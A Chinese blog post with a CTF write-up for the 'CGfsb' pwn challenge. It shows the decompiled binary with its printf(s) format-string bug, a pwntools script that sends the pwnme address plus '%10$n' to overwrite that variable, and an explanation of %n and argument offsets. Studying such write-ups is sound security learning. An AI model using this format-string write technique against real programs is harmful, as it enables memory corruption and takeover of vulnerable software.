printf(&x)的利用——CGfsb题解

最新推荐文章于 2022-11-13 21:06:52 发布
最新推荐文章于 2022-11-13 21:06:52 发布
阅读量381 收藏
点赞数
分类专栏: 信息安全 文章标签: c语言 c++ CTF 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Little_Small_Joze/article/details/114650853
版权

例行检测

file CGfsb

在这里插入图片描述

checksec CGfsb

在这里插入图片描述

反编译

int __cdecl main(int argc, const char **argv, const char **envp)
{
  _DWORD buf[2]; // [esp+1Eh] [ebp-7Eh] BYREF
  __int16 v5; // [esp+26h] [ebp-76h]
  char s[100]; // [esp+28h] [ebp-74h] BYREF
  unsigned int v7; // [esp+8Ch] [ebp-10h]

  v7 = __readgsdword(0x14u);
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  buf[0] = 0;
  buf[1] = 0;
  v5 = 0;
  memset(s, 0, sizeof(s));
  puts("please tell me your name:");
  read(0, buf, 0xAu);
  puts("leave your message please:");
  fgets(s, 100, stdin);//真的是说到曹操曹操到,今天刚被教练提了一嘴这个函数,总之,见到它确实有被失望到
  printf("hello %s", (const char *)buf);
  puts("your message is:");
  printf(s);//有的题解这一行反编译出来是printf(&a),感觉有被不公平到。这一行但凡直接写成printf(&a),也算是个友好题,因为这样写第一反应是printf("字符串")感觉无比正常
  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }
  else
  {
    puts("Thank you!");
  }
  return 0;
}

攻击代码

from pwn import *

r = remote('ip', num)
pwnme_addr = 0x00000000//这个以IDA显示的pwnme地址编号为准
payload = p32(pwnme_addr) + b'aaaa' + b'%10$n'     
r.recvuntil("please tell me your name:\n")
r.sendline('abcdef')
r.recvuntil("leave your message please:\n")
r.sendline(payload)
r.interactive()

在这里插入图片描述

本题思路

  1. printf()中%n可以改变其他变量值,往给定的地址中写入“%n”前面的字符个数。如果是英文则一个字符一个字节,中文包括中文标点则是一个字符两个字节。

  2. 如果没有参数,但是规定了偏移量,则从格式字符串开始的地方往下数偏移量个内存块快(也就是第偏移量个参数的内存处),然后读取这个作为参数。

  3. %n需要的参数是一个地址,所以直接在s上写入我们需要修改的变量的地址,再想办法(办法就是偏移量)让这个地址成为%n的参数,把这个地址对应的值改变成我们想要的8。
    在这里插入图片描述

  4. 我们找到的pwnme的地址p32一下以后是4位的,但是我们需要一个“%n”数出来是8的字符串,所以给它再加4个字符。

  5. 偏移量的测试如下:
    在这里插入图片描述
    可见我们输入的s是printf( )的“第10个参数”,也就是偏移量是10。“第10个参数”的意思是,如果print()有参数,那么第10个参数对应的内存位置就是这个s字符串现在(没有参数的情况下)被存储的位置。

    显而易见,之所以这样用偏移量任意读取内存,是因为print()没有检查参数的个数。

不是胖狐狸诶
关注
专栏目录
华为OD机试题库大全【JAVA&Python&C++&JS题解
mrdeam的博客
03-27 1423
OD机试是一项重要环节,用于评估应聘者的编程能力和算法理解程度。在申请OD岗位时,应聘者需要首先通过机试的考核,才有机会进入后续的面试环节。机试的内容主要包括算法和数据结构的应用,题型可能涵盖递归、分治、单调栈、并查集、滑动窗口、前缀和、查分、二分查找、BFS广搜以及DFS深搜等多种算法。考试形式为在线答题,题目难度和具体内容会根据不同的招聘岗位而有所调整。华为OD机试共有三道题,前两道题的总分是100分,第三道题总分是200分,考试时长为150分钟。
格式化字符串漏洞原理及简单利用(CGfsb题解)
Sea_Sand息禅
04-02 5412
先介绍一下格式化字符串漏洞,这种漏洞在实际中应该很少有了,但仍然需要了解这些基础的漏洞知识。 会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数,该题就是利用printf的漏洞,下面以printf为例进行介绍。 printf函数的使用方法为:printf("format",输出表列),由于format部分可以有许多的占位符及字母,所以接受的参...
【数据结构】参数引用“&“ 和 printf( “ x=%d\n “ ,x)
JJL的博客
07-11 1373
&表示 c++ 中的引用调用,==> 对参数的修改结果需要“带回来时” 需要用到。 本质原因: 在 test 函数中,单纯参数的 x(无&),开辟了一个新内存存放参数 x, 将主函数中 x(内存地址和test函数中的 x地址不同) 的值复制过去。 test 函数对x的操作都是对复制值后的新地址进行操作,与主存的x没有关系。 一个是原件,一个是复印件,对复印件进行操作不影响原件。 在第二个函数中,参数类型为引用类型,这就代表 &x 的x 不开辟...
c语言 字符输出要加 吗,最后的printf为什么要加&,他不是输出字符串吗
weixin_36204061的博客
05-17 1186
该楼层疑似违规已被系统折叠隐藏此楼查看此楼+FAQ为什么要特别反对“把数组名当成指针”这种调调?因为这是严重的误导,还不止一个。为什么这是误导?有好几个原因,只提重点。最显然地,这不合 C 的语言规则。这根本就不是 C 语言的内容。鼓吹这种伪规则,会让用户自认为“学会了”的错觉。这样的用户,实际只是冒牌货——他们会的,充其量是自以为是的不存在规格说明的臆想非主流方言;这些方言之间因为臆想程度的不...
CGfsb writeup 格式化字符串漏洞的简单利用
ditto的博客
12-22 4248
如果对格式化字符串漏洞不怎么了解,推荐看《灰帽黑客》这本书,也可以看看我博客里的https://blog.csdn.net/qq_43394612/article/details/84900668 拿到题目,先看下开启了什么保护措施 没有开启PIE(内存地址分布随机化) file下 是动态链接 运行下 就是让你先输入name,再输入message就完事了。 放到IDA里看一下。 很明显是格...
XCTF 简单的文件包含
weixin_69830800的博客
11-13 984
简单的文件包含,泰山
牛客网剑指offer——Java题解.pdf
09-07
剑指offer Java题解 本资源总结了牛客网剑指offer Java题解的关键知识点,涵盖了Java基本概念、数据结构和算法等方面的知识。 JZ1 二维数组中的查找 * 题目描述:在一个二维数组中查找指定的整数。 * 解题思路:...
leetcode跳跃-leetcode:飞蟒Python——FlyPythonLeetCode题解
06-30
leetcode 跳跃 leetcode —— 目录 LCCI 程序员面试金典 LeetCode中文 每日一题 公众号:FlyPython
经典题目——救援——题解
07-05
经典题目——救援——题解
C printf输出格式控制
dragon_cdut的博客
02-17 3685
原文地址:http://c.biancheng.net/view/159.html 输入输出函数(printf 和 scanf)是C语言中非常重要的两个函数,也是学习C语言必学的两个函数。在C语言程序中,几乎没有一个程序不需要这两个函数,尤其是输出函数(printf),所以这两个函数必须要掌握。 如果在程序中要使用 printf 或者 scanf,那么就必须要包含头文件 stdio.h。因为这两...
printf格式化输出%x时的分析
热门推荐
jmhIcoding
12-26 4万+
使用printf(“%x”,…);可以输出指定参数的16进制形式,但是在实际的使用中,参数不一定都是32位的整数,有可能是16位的short,8位的char。如果使用printf %x 输出short和char会是什么结果呢? 为此,在VS2015编写简单代码如下:#include <stdio.h> #include <stdlib.h> int main() { int l;
printf输出 %#x
在线笔记
10-08 4341
#include stdio.h> #include stdlib.h> #include string.h> int main(int argc, char **argv) {     int i;
printf&scanf的使用注意事项
橙子的博客
07-14 1514
1、 格式化说明符: 格式化说明符与printf()函数中的格式说明符基本相同。但和printf()函数中格式字符串的用法有一些小区别。可查c primer plus 的68页以及79页。scanf:注意事项 (1) 对于字符串数组或字符串指针变量,由于数组名和指针变量名本身就是地址,因此使用scanf()函数时,不需要在它们前面加上”&”操作符。 (2)
STM32USART串口调节与printf重定义
要恰饭得嘛
06-07 3704
首先,printf重定义后可以直接使用printf函数从串口发送数据在usart.c中添加代码:#ifdef __GNUC__  /* With GCC/RAISONANCE, small printf (option LD Linker-&gt;Libraries-&gt;Small printf     set to 'Yes') calls __io_putchar() */  #defin...
printf
smallmount123的专栏
08-22 1890
IAR printf举例: http://www.openedv.com/thread-24176-1-1.html /** *Printf打印函数 * @param format Printf格式 */ void Debug_Printf(const char *format, …) { uint32_t length; va_list args; va
xctf攻防世界getit writeup
qq_42983283的博客
11-04 626
下载查看: ida64打开,f5分析: int __cdecl main(int argc, const char **argv, const char **envp) { char v3; // al@4 int result; // eax@10 __int64 v5; // rbx@10 __int64 v6; // [sp+0h] [bp-40h]@0 int i; // [sp+4h] [bp-3Ch]@7 FILE *stream; // [sp+8h] [..
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解
qq_35066257的博客
09-25 862
攻防世界新手pwn题:CGfsb (格式化字符串漏洞)初解 在开始看这题之前,可以看CTF-wiki中有关格式化字符串漏洞的利用[link]https://wiki.x10sec.org/pwn/fmtstr/fmtstr_exploit/ 这边就简单的介绍格式化字符串中覆盖内存的方式:%n$n,这串字符的意思是将前面打印的字符个数,写入到第n个指针对应的地址中,下面就以CGfsb这题来举个例子 ...
Java启动参数(-, -X, -XX参数)详解
我是guyue,guyue就是我O(∩_∩)O
08-12 3万+
目录 Java启动参数分类 一、JVM标准参数(-) 获取方法:java -help 二、JVM非标准参数(-X) 获取方法:java -X 三、JVM非Stable参数(-XX) 获取方法:java -XX:+PrintFlagsInitial JDK8的-XX参数整理 JDK8 获取所有-XX参数列表 1.8所有-XX参数列表 Java启动参数分类 类别1: 其一是标准参数(-),所有的JVM实现都必须实现这些参数的功能,而且向后...
LOJ6354 & 洛谷4366:[Code+#4]最短路——题解
最新发布
05-17
这道题需要使用 Dijkstra 算法来解决。 Dijkstra 算法是一种贪心算法,用于解决没有负权边的单源最短路径问题。算法的基本思想是:从源点开始,每次选择当前最短路径的节点,并更新其周围节点的距离。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值